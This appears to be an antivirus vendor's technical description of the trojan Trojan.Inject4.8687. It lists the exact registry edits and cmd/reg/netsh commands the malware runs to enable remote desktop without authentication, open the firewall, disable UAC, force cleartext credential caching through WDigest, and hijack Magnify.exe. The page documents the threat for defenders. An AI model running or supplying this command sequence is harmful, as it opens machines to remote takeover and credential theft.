Trojan.Inject4.8687

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKLM>\SYSTEM\CurrentControlSet\Control\Lsa] 'Security Packages' = '{6b,00,65,00,72,00,62,00,65,00,72,00,6f,00,73,00,00,00,6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,73,00,63,00,68,00,61,00,6e,...
[<HKLM>\SYSTEM\CurrentControlSet\Control\SecurityProviders] 'SecurityProviders' = 'msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, credssp.dll'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe] 'Debugger' = 'taskmgr.exe'

Malicious functions

To complicate detection of its presence in the operating system,

blocks the following features:

User Account Control (UAC)

Executes the following

'<SYSTEM32>\netsh.exe' firewall set service remoteadmin enable
'<SYSTEM32>\netsh.exe' firewall set service remotedesktop enable

Injects code into

the following system processes:

<SYSTEM32>\svchost.exe

Miscellaneous

Creates and executes the following

'<SYSTEM32>\cmd.exe' /c sc start TermService' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v MaxIdleTime /t REG_DWORD /d "00000000"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v MaxDisconnectionTime /t REG_DWORD /d "00000000"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c netsh firewall set service remoteadmin enable' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "taskmgr.exe"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" REG_DWORD /d 0x0 /f' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x0 /f' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders" /f /v SecurityProviders /t REG_SZ /d "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, credssp.dll"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /f /v UseLogonCredential /t REG_DWORD /d 0x01' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /f /v "Security Packages" /t REG_BINARY /d "6b00650072006200650072006f00730000006d007300760031005f003000000073006300680061006e006e0065006c...' (with hidden window)
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f' (with hidden window)
'<SYSTEM32>\cmd.exe' /c netsh firewall set service remotedesktop enable' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /c sc start TermService
'<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
'<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
'<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
'<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "taskmgr.exe"
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
'<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v MaxDisconnectionTime /t REG_DWORD /d "00000000"
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v MaxIdleTime /t REG_DWORD /d "00000000"
'<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v MaxIdleTime /t REG_DWORD /d "00000000"
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v MaxDisconnectionTime /t REG_DWORD /d "00000000"
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "taskmgr.exe"
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /f /v "Security Packages" /t REG_BINARY /d "6b00650072006200650072006f00730000006d007300760031005f003000000073006300680061006e006e0065006c...
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /f /v "Security Packages" /t REG_BINARY /d "6b00650072006200650072006f00730000006d007300760031005f003000000073006300680061006e006e0065006c0000007...
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /f /v UseLogonCredential /t REG_DWORD /d 0x01
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /f /v UseLogonCredential /t REG_DWORD /d 0x01
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders" /f /v SecurityProviders /t REG_SZ /d "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, credssp.dll"
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders" /f /v SecurityProviders /t REG_SZ /d "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, credssp.dll"
'<SYSTEM32>\sc.exe' start TermService
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" REG_DWORD /d 0x0 /f
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" REG_DWORD /d 0x0 /f
'<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c netsh firewall set service remoteadmin enable
'<SYSTEM32>\cmd.exe' /c netsh firewall set service remotedesktop enable

Tecnologie

Termini

Formazione ed informazione

Falsi miti

Technical Information

Curing recommendations

Free trial